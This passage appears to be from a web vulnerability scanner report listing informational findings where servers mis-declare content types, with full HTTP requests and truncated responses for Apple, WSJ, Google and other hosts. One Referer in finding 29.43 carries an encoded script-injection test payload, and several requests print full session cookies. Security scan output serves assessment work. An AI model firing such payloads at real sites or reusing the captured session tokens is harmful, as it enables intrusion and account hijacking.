29.34. http://consultants-locator.apple.com/javascript/yui/utilities.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/utilities.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /javascript/yui/utilities.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 119446
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.8.0r4
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YA
...[SNIP]...

29.35. http://consultants-locator.apple.com/javascript/yui/yahoo.1287529288.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://consultants-locator.apple.com
Path:	/javascript/yui/yahoo.1287529288.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html;charset=UTF-8

The response states that it contains HTML. However, it actually appears to contain CSS.

Request

GET /javascript/yui/yahoo.1287529288.js HTTP/1.1
Host: consultants-locator.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010
Cookie: ccl=L6y0Y04IA+HszMqH9mHTdUv4FcSGIygXtr7/piBs8BrDdYNF2lt6a6zmXFqSV7KbwwuMO/wGtF9zIU6o3/4RIFATL0eS+uIg/TILk/xTdAPZn9lXEZn5uP421EsJbcF08blOjhAg7uusZ0nvQbhgaca59LwMkWbZ6qQStKu7UqutBU0pXDTr1iVoSE7cK0Hu6Wef9mN6JcI4/1FmsJjmrd6QM0kZA+AVPpGwSiAJrcBoe83IQNTHxBQyKPn41UgWuCHh+qy3y+MFAMD5QO/3IkvBzglIy0135x/7lxyonLMXLVnvMtLlNO94rYK63mkmwRyeW1iLvkb/xz1GTdEO5NlCKgHgHOFtGnIFkkjkerm56/6ykraMD2/ucb2+fRCn4YntWujyUc1NExWd653nGMnU9a7ndOvf99eGT2wTyRiO+VNFWLO73xrjJZBvwXOpsCp+v4N6f4N3uNuIHeoSF4hj0kxAvK/UA+BszIRWqzF+8NunL7htJzsB5+ZAyynISjVGuMIPs5FTLh23kYIdul1RkGGEuQimALYAplr5yB+B8uavIlixhRrco1xx03Ri; geo=US; PHPSESSID=b2f1f3c83845849b0ad6cb118c22b092

Response

HTTP/1.0 200 OK
Date: Thu, 21 Jul 2011 20:41:14 GMT
Server: Apache/2.2.3 (Red Hat)
Expires: Sat, 20 Aug 2011 16:41:14 UTC
Cache-Control: Public
Pragma: Public
Content-Length: 5863
Connection: close
Content-Type: text/html;charset=UTF-8

/*
Copyright (c) 2009, Yahoo! Inc. All rights reserved.
Code licensed under the BSD License:
http://developer.yahoo.net/yui/license.txt
version: 2.7.0
*/
if(typeof YAHOO=="undefined"||!YAHOO){var YAHO
...[SNIP]...

29.36. http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cs.wsj.net
Path:	/community/content/images/misc/groups/otherquestionmark.25x25.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/groups/otherquestionmark.25x25.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 501
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/groups/otherquestionmark.25x25.png
Last-Modified: Thu, 23 Jun 2011 19:44:54 GMT
Accept-Ranges: bytes
ETag: "0fffe5de31cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:30:56 GMT

GIF89a.........................mmm.........vvviii.........zzz]]]...bbbrrr........................xxx~~~|||...............NNN.................................HHH..................fff.........VVV???....
...[SNIP]...

29.37. http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://cs.wsj.net
Path:	/community/content/images/misc/members/defaultuser.50x50.png

Issue detail

The response contains the following Content-type statement:

Content-Type: image/png

The response states that it contains a PNG image. However, it actually appears to contain a GIF image.

Request

GET /community/content/images/misc/members/defaultuser.50x50.png HTTP/1.1
Host: cs.wsj.net
Proxy-Connection: keep-alive
Referer: http://online.wsj.com/article/SB10001424053111904233404576462461660747244.html?mod=WSJ_hp_LEFTWhatsNewsCollection
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Length: 1559
Content-Type: image/png
Content-Location: http://cs.wsj.net/community/content/images/misc/members/defaultuser.50x50.png
Last-Modified: Thu, 23 Jun 2011 19:44:58 GMT
Accept-Ranges: bytes
ETag: "059618de31cc1:0"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:30:56 GMT

GIF89a2.2.......DDD...888.........KKKUUUYYYjjj...aaahhh...^^^........................fff.........QQQ...ddd...........................uuuyyy~~~xxxsssrrr{{{}}}qqqttt|||...ooo......nnnmmm...lll...zzzvvvw
...[SNIP]...

29.38. http://event.adxpose.com/event.flow previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://event.adxpose.com
Path:	/event.flow

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript;charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /event.flow?eventcode=000_000_12&location=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&uid=amRZRPmRXMjwy5CP_10671987&xy=0%2C0&wh=728%2C90&vchannel=610&cid=acerno&iad=1311428805773-56517315376549960&cookieenabled=1&screenwh=1920%2C1200&adwh=728%2C90&colordepth=32&flash=10.3&iframed=1 HTTP/1.1
Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer=
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=6805757a-ba62-4ca3-815c-dec40d38f03a

Response

29.39. http://geek.net/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://geek.net
Path:	/favicon.ico

Issue detail

The response contains the following Content-type statement:

Content-Type: text/plain

The response states that it contains plain text. However, it actually appears to contain unrecognised content.

Request

GET /favicon.ico HTTP/1.1
Host: geek.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Cookie: __utma=67863687.320725483.1311396188.1311396188.1311396188.1; __utmb=67863687.1.10.1311396188; __utmc=67863687; __utmz=67863687.1311396188.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; __utma=1.1370803812.1311396188.1311396188.1311396188.1; __utmb=1.1.10.1311396188; __utmc=1; __utmz=1.1311396188.1.1.utmcsr=fakereferrerdominator.com|utmccn=(referral)|utmcmd=referral|utmcct=/referrerPathName; scorecardresearch=1123036883-1390879142-1311396188113

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Fri, 08 Oct 2010 14:56:04 GMT
ETag: "47e-4921c35ab4900"
Cache-Control: max-age=290304000, public
Expires: Thu, 15 Apr 2018 20:00:00 GMT
Content-Type: text/plain
Content-Length: 1150
Date: Sat, 23 Jul 2011 04:51:29 GMT
X-Varnish: 818876205 818876200
Age: 33
Via: 1.1 varnish
Connection: keep-alive

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...

29.40. http://go.ionearth.com/sites/all/themes/ionearth_base/js/cufon/cufon-replace.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://go.ionearth.com
Path:	/sites/all/themes/ionearth_base/js/cufon/cufon-replace.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/javascript

The response states that it contains script. However, it actually appears to contain plain text.

Request

GET /sites/all/themes/ionearth_base/js/cufon/cufon-replace.js?u HTTP/1.1
Host: go.ionearth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://go.ionearth.com/

Response

HTTP/1.1 200 OK
Server: Apache/2.2.14 (Ubuntu)
Last-Modified: Tue, 10 May 2011 20:18:33 GMT
ETag: "7e68c-9a-4a2f1a8ffd840"
Cache-Control: max-age=1209600
Expires: Sun, 31 Jul 2011 20:33:02 GMT
Vary: Accept-Encoding
Content-Type: application/javascript
Content-Length: 154
Date: Fri, 22 Jul 2011 21:11:24 GMT
X-Varnish: 10824717 10767546
Age: 434302
Via: 1.1 varnish
Connection: keep-alive

Cufon.replace('.logo span, h1, h2, h3, h4 , h5, h6, .learnmore, .prosto_button, .comment-reply-link, .slide_button, .page_title .bold p, .textonlycont');

29.41. http://hipservice.live.com/gethip.srf previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://hipservice.live.com
Path:	/gethip.srf

Issue detail

The response contains the following Content-type statement:

Content-Type: text/html; charset=utf-8

The response states that it contains HTML. However, it actually appears to contain script.

Request

Response

29.42. http://i3.silverlight.net/css/main.css previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://i3.silverlight.net
Path:	/css/main.css

Issue detail

The response contains the following Content-type statement:

Content-Type: text/css

The response states that it contains CSS. However, it actually appears to contain unrecognised content.

Request

GET /css/main.css?cdn_id=48751043 HTTP/1.1
Host: i3.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/css,*/*;q=0.1
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.silverlight.net/getting-started

Response

HTTP/1.1 200 OK
Content-Type: text/css
Last-Modified: Fri, 22 Jul 2011 16:29:13 GMT
Accept-Ranges: bytes
ETag: "a0f5f07d8c48cc1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Vary: Accept-Encoding
Content-Length: 122717
Cache-Control: max-age=94304666
Date: Sat, 23 Jul 2011 04:46:41 GMT
Connection: close

/*
Theme Name: Silverlight

[Table Of Contents]

0- Reset & Layout
1- Global
2- Links
3- Headings
4- Header
5- Navigation
6- Middle
7- Forms
8- Extras
9- Footer
...[SNIP]...

29.43. http://images.apple.com/global/nav/scripts/globalnav.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.apple.com
Path:	/global/nav/scripts/globalnav.js

Issue detail

The response contains the following Content-type statement:

Content-Type: application/x-javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /global/nav/scripts/globalnav.js HTTP/1.1
Host: images.apple.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants.apple.com/services.php/fca6c%22%3E%3Cscript%3Ealert(document.location)%3C/script%3Ec29f000149b

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 21 Apr 2011 20:13:41 GMT
ETag: "6e6f-4a173609c2740"
Vary: Accept-Encoding
Server: Apache/2.2.14 (Unix)
X-Cached-Time: Tue, 03 May 2011 13:03:51 GMT
X-Cache-TTL: 600
Cneonction: close
nnCoection: close
Accept-Ranges: bytes
Content-Type: application/x-javascript
Content-Length: 28271
Cache-Control: max-age=360
Expires: Thu, 21 Jul 2011 20:49:13 GMT
Date: Thu, 21 Jul 2011 20:43:13 GMT
Connection: close

if(typeof(AC)=="undefined"){AC={}}document.createElement("nav");AC.addEvent=function(b,a,c){if(b.addEventListener){return b.addEventListener(a,c,false)
}else{return b.attachEvent("on"+a,c)}};AC.remove
...[SNIP]...

29.44. http://images.apple.com/support/expresslane/data/properties.json previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.apple.com
Path:	/support/expresslane/data/properties.json

Issue detail

The response contains the following Content-type statement:

Content-Type: application/json

The response states that it contains JSON. However, it actually appears to contain unrecognised content.

Request

GET /support/expresslane/data/properties.json HTTP/1.1
Host: images.apple.com
Proxy-Connection: keep-alive
Referer: http://www.apple.com/support/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US

Response

HTTP/1.1 200 OK
Last-Modified: Thu, 21 Jul 2011 18:52:40 GMT
ETag: "84be-4a898da6e4e00"
Server: Apache/2.2.3 (Oracle)
Content-Length: 33982
Content-Type: application/json
Cache-Control: max-age=450
Expires: Thu, 21 Jul 2011 20:39:22 GMT
Date: Thu, 21 Jul 2011 20:31:52 GMT
Connection: close

AppleCareWeb.Modules.ExpressLane.Properties={"eligiblelist":{"App":{"de_AT":["at"],"de_CH":["chde"],"de_DE":["de"],"en_CA":["ca"],"en_GB":["uk"],"en_IE":["ie"],"en_US":[""],"es_ES":["es"],"fr_CA":["ca
...[SNIP]...

29.45. http://images.lifescript.com/images/button/sign-up.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.lifescript.com
Path:	/images/button/sign-up.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a PNG image.

Request

GET /images/button/sign-up.gif HTTP/1.1
Host: images.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/css/Global.css
Cookie: __utma=22852774.274049985.1311276131.1311276131.1311276131.1; __utmb=22852774.2.10.1311276131; __utmc=22852774; __utmz=22852774.1311276131.1.1.utmcsr=outbrain|utmccn=ADHD_Adult|utmcmd=cpc; __qca=P0-1418956191-1311276132113

Response

HTTP/1.1 200 OK
Content-Length: 4783
Content-Type: image/gif
Last-Modified: Mon, 28 Jul 2008 19:47:56 GMT
Accept-Ranges: bytes
ETag: "0fe9ad4eaf0c81:1c28"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Thu, 21 Jul 2011 19:22:08 GMT
Connection: close

.PNG
.
...IHDR...f...........:.....tEXtSoftware.Adobe ImageReadyq.e<...QIDATx..Yi...q...s..}q.\.KR<.S.hQ..@.`...C.!..!XH..r.A1r...... .. H"'A.$........J2.H!-...]ry...wfw...~.....Y..O..z.............
...[SNIP]...

29.46. http://images.lifescript.com/images/menu/subnavslice.gif previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://images.lifescript.com
Path:	/images/menu/subnavslice.gif

Issue detail

The response contains the following Content-type statement:

Content-Type: image/gif

The response states that it contains a GIF image. However, it actually appears to contain a JPEG image.

Request

GET /images/menu/subnavslice.gif HTTP/1.1
Host: images.lifescript.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/css/Global.css
Cookie: __utma=22852774.274049985.1311276131.1311276131.1311276131.1; __utmb=22852774.2.10.1311276131; __utmc=22852774; __utmz=22852774.1311276131.1.1.utmcsr=outbrain|utmccn=ADHD_Adult|utmcmd=cpc; __qca=P0-1418956191-1311276132113

Response

HTTP/1.1 200 OK
Content-Length: 311
Content-Type: image/gif
Last-Modified: Wed, 14 Oct 2009 21:46:01 GMT
Accept-Ranges: bytes
ETag: "807297b8174dca1:1c28"
Server: Microsoft-IIS/6.0
MicrosoftOfficeWebServer: 5.0_Pub
X-Powered-By: ASP.NET
Cache-Control: max-age=86400
Date: Thu, 21 Jul 2011 19:22:07 GMT
Connection: close

......JFIF.....d.d......Ducky.......(......Adobe.d.............. .. ...
..............................$$''$$53335;;;;;;;;;;..........................%......% #...# ((%%((22022;;;;;;;;;;...........
...[SNIP]...

29.47. http://km.support.apple.com/kb/resources/js/ACShortcuts.js previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://km.support.apple.com
Path:	/kb/resources/js/ACShortcuts.js

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /kb/resources/js/ACShortcuts.js HTTP/1.1
Host: km.support.apple.com
Proxy-Connection: keep-alive
Referer: http://support.apple.com/kb/index?page=search&src=support_site.home.search&locale=en_US&q=xss
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26E72CC1050115FB-600001068002ECF7[CE]; ac_survey=1; dssid2=551d8f7b-875a-4573-a5cf-6a3ef5da7954; dslang=US-EN; s_cvp35b=%5B%5B'burp'%2C'1309456135633'%5D%2C%5B'google%253A%2520organic'%2C'1310087563005'%5D%2C%5B'burp'%2C'1311172302500'%5D%5D; POD=us~en; ac_search=xss%7C%7C; s_orientation=%5B%5BB%5D%5D; s_ria=Flash%2010%7C; s_pathLength=homepage%3D1%2C; s_vnum_us=ch%3Dsupport%26vn%3D10%3Bch%3Dipod%26vn%3D3%3Bch%3Dmac%26vn%3D2%3Bch%3Dip%26vn%3D3%3Bch%3Dipad%26vn%3D3%3Bch%3Ditunes%26vn%3D5%3Bch%3Dmacbookpro%26vn%3D1%3Bch%3Dipodnano%26vn%3D3%3Bch%3Dlegal%26vn%3D5%3Bch%3Dretailstore%26vn%3D4%3Bch%3Dbuy%26vn%3D4%3Bch%3Dcontact%26vn%3D1%3Bch%3Dhotnews%26vn%3D1%3Bch%3Dother%26vn%3D1%3Bch%3Dabout%26vn%3D1%3Bch%3Dsafari%26vn%3D1%3Bch%3Deducation%26vn%3D2%3Bch%3Dadvertising%26vn%3D1%3Bch%3Dseminars%26vn%3D1%3Bch%3Dpr%26vn%3D1%3Bch%3Dhomepage%26vn%3D1%3B; s_invisit_us=homepage%3Dtrue%3B; s_ppv=apple%2520-%2520index%2Ftab%2520%2528us%2529%2C73%2C73%2C723%2C; s_orientationHeight=723; dfa_cookie=appleglobal%2Capplehome; s_pv=apple%20-%20index%2Ftab%20(us); s_cc=true; s_sq=%5B%5BB%5D%5D; ccl=YPG5TuFKot1LUn+lq23wrLdlvLPUZJXpPAP21q2AZI6ybOrmCQ9ZvagVaKElnHhuLxZWILPlyU10pXqhEcXHaZA8muizMYxVUyHDxAP/1nqg7Or3wEZaQGRv2xbBSUJmA90kWKiGNAW6Uf7jiyrAIqTtFgtOeWA2YYfTbJKKJt52YHNnKf5HURbWq1GKAWWdJwNuJX/jqQEzK8RJ4TumuXXzJMQryFbRo53bGT4o5YXTEstHYlEdhotv+GFiYid8W80i+u1p++O5ZSdYF3iEuzrN9myAmXbFZrGgn5TxcGU8v9leUS7EKDYqNxvqeypQHhHbO2dc9DqxVa1LGZTPv6wiFB5gKx83rZDijFgpC4S249Tgf+zDP3cBbWAEmvi2KDdVVFonUlUfpWpd1AK3CVm/Oi98XAN+OlMwHC/CdDLWB7VyDpfX5gJd+ZmnJ1I0sLGBXu3Ns7cDz4Rj66ko8ELCLhslcfJMEh45qUnY1+KFoUzgtF1EO6KPe5w2KQbxekoRSFW6zhoc9CCfqgPX9EQI85tjSAyuM2cQWDApn7n21P5svZBUoF4SrBI9fy6L; geo=US
If-None-Match: W/"57923-1306076072000"
If-Modified-Since: Sun, 22 May 2011 14:54:32 GMT

Response

HTTP/1.1 200 OK
Server: Apache/1.3.33 (Darwin) mod_ssl/2.8.24 OpenSSL/0.9.7l PHP/5.2.4 DAV/1.0.3 mod_jk/1.2.28
ETag: W/"57763-1310758574000"
Last-Modified: Fri, 15 Jul 2011 19:36:14 GMT
Content-Type: text/javascript
Vary: Accept-Encoding
Content-Length: 57763
Date: Thu, 21 Jul 2011 20:46:55 GMT
Connection: close

// = AC =
// Apple core helper functions:
if (typeof(AC) == 'undefined') { AC = {}; }

// == HTML5 <nav> ==
// Add the HTML5 nav element for future proof-ness.
document.createElement('nav');

// == {{
...[SNIP]...

29.48. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/AuthenticationService.Authenticate

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain plain text.

Request

Response

29.49. http://maps.googleapis.com/maps/api/js/ViewportInfoService.GetViewportInfo previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.googleapis.com
Path:	/maps/api/js/ViewportInfoService.GetViewportInfo

Issue detail

The response contains the following Content-type statement:

Content-Type: text/javascript; charset=UTF-8

The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

Response

29.50. http://maps.gstatic.com/intl/en_us/mapfiles/openhand_8_8.cur previous next

Summary

Severity:	Information
Confidence:	Firm
Host:	http://maps.gstatic.com
Path:	/intl/en_us/mapfiles/openhand_8_8.cur

Issue detail

The response contains the following Content-type statement:

Content-Type: image/bmp

The response states that it contains a BMP image. However, it actually appears to contain unrecognised content.

Request

GET /intl/en_us/mapfiles/openhand_8_8.cur HTTP/1.1
Host: maps.gstatic.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://consultants-locator.apple.com/index.php?fuseaction=home.directory&offset=0&rppg=8&q=10010

Response

HTTP/1.1 200 OK
Content-Type: image/bmp
Last-Modified: Thu, 17 Sep 2009 03:15:42 GMT
Date: Thu, 21 Jul 2011 20:42:58 GMT
